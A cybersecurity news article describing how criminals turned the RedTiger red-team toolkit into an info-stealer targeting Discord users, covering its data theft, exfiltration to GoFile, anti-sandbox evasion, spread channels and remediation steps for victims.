News
Hackers Turn RedTiger Into Data-Stealing Malware Targeting Discord Users
A powerful open-source security tool built for ethical hacking is now being exploited by cybercriminals. Attackers are using RedTiger, a Python-based red-team toolkit, to build an info-stealing malware that targets Discord users and payment data, raising new alarms about the dark side of open-source software.
RedTiger Misused as a Weapon Against Discord Users
RedTiger, originally designed for penetration testing on Windows and Linux, has recently become a favorite among threat actors. The tool includes modules for network scanning, password cracking, open-source intelligence (OSINT) collection, and Discord utilities. However, its malware builder feature has made it easy for attackers to craft info-stealing programs with minimal effort.
According to new findings from cybersecurity firm Netskope, criminals have repurposed RedTiger’s info-stealer component to harvest sensitive data from Discord users, particularly targeting French-speaking communities.
The malicious RedTiger variant collects Discord tokens, payment details, and multi-factor authentication data, posing a serious threat to both personal and financial security.
How the Malware Works
Once compiled into standalone executables using PyInstaller, attackers disguise the files under appealing names linked to gaming or Discord tools. When executed, the malware begins scanning the infected computer for local database files and browser data.
It uses regular expressions (regex) to extract Discord tokens and validate them before retrieving the victim’s account details such as email, subscription plans, and authentication status. The malware then injects custom JavaScript into Discord’s core files, particularly the index.js script, allowing it to intercept every API call and capture real-time events.
Among the most alarming aspects of the attack is its ability to extract saved payment data including PayPal and credit card information from Discord’s local storage.
Expanding Beyond Discord to Broader Data Theft
RedTiger’s weaponized variant doesn’t stop at Discord. It also harvests:
Saved browser passwords, cookies, and history
Cryptocurrency wallet files
Game account data, including Roblox and Steam
Sensitive local files with extensions like
.TXT,.SQL, and.ZIP
Additionally, it takes screenshots and webcam snapshots, giving attackers a visual glimpse into the victim’s environment.
Below is a summary of what RedTiger targets:
| Data Type | Description |
|---|---|
| Discord | Tokens, MFA info, payment details |
| Browsers | Passwords, cookies, credit cards |
| Crypto Wallets | Private keys and wallet files |
| Games | Roblox and other gaming accounts |
| Filesystem | Text, SQL, and ZIP files |
Once all information is gathered, RedTiger compresses the data and uploads it to GoFile, a cloud service that allows anonymous file sharing. The attacker then receives the link through a Discord webhook, along with the victim’s system metadata.
Evasion Tactics That Complicate Detection
RedTiger’s modified malware exhibits advanced evasion techniques. It terminates itself when it detects debugging tools or sandbox environments, commonly used by security researchers to analyze malicious software.
To further evade detection, it spawns hundreds of fake processes and creates random files to overwhelm forensic analysis systems. This behavior makes it harder for analysts and automated tools to identify the core malicious actions within the system.
One cybersecurity researcher described it as “a nightmare for sandbox environments,” since its process-spawning technique effectively floods monitoring tools.
How Attackers Spread RedTiger Malware
Although Netskope has not confirmed exact infection channels, common distribution routes have emerged. These include:
Discord servers and community channels
YouTube videos promising free game tools or cheats
Malicious software download sites
Online forums promoting “boosters” or “mods”
Malvertising campaigns on gaming platforms
This trend highlights the continued risk of social engineering, where attackers lure users with attractive downloads that secretly carry malware payloads.
What Users Can Do to Stay Safe
If you suspect that your system might be infected with a RedTiger-based malware, take these immediate actions:
Revoke your Discord tokens from the Discord settings menu.
Change your passwords on all linked accounts.
Reinstall the Discord client directly from its official website.
Clear your browser data, including saved passwords and cookies.
Enable multi-factor authentication (MFA) on all critical accounts.
Users should never download executables or “tools” from unverified sources, especially ones that claim to enhance games or Discord performance.
Cybersecurity experts recommend sticking to trusted download platforms and ensuring antivirus software is updated. RedTiger’s misuse is another reminder of how open-source projects, though created for good, can be turned into powerful weapons in the wrong hands.
As the open-source security landscape evolves, ethical developers are now being urged to implement safeguards or licensing checks that limit dangerous misuse of their tools.
The rise of RedTiger as a cyber threat underlines a growing challenge for the security community — balancing transparency and freedom of open-source projects with responsible controls against abuse.
In a world where attackers can weaponize legitimate tools within hours, awareness and caution remain the first lines of defense.
Hackers Turn RedTiger Into Data-Stealing Malware Targeting Discord Users
Sydney Sweeney Stuns Fans With Bold New Bob at AFI Screening
Millions of WordPress Sites Under Attack Through Old Plugin Flaws
Victoria Beckham Loses Legal Fight Amid Ongoing Family Rift
Toys “R” Us Canada Confirms Customer Data Leak After Cyber Attack
Cipher Mining Surges After Triple Price Target Boosts and New AI Deal
Met Police Crack £5.5 Billion Bitcoin Seizure in Historic Fraud Case
Dogecoin jumps 13 percent as Bitcoin surge lifts crypto market
Microsoft Blocks Risky SVG Images in Outlook to Stop Attacks
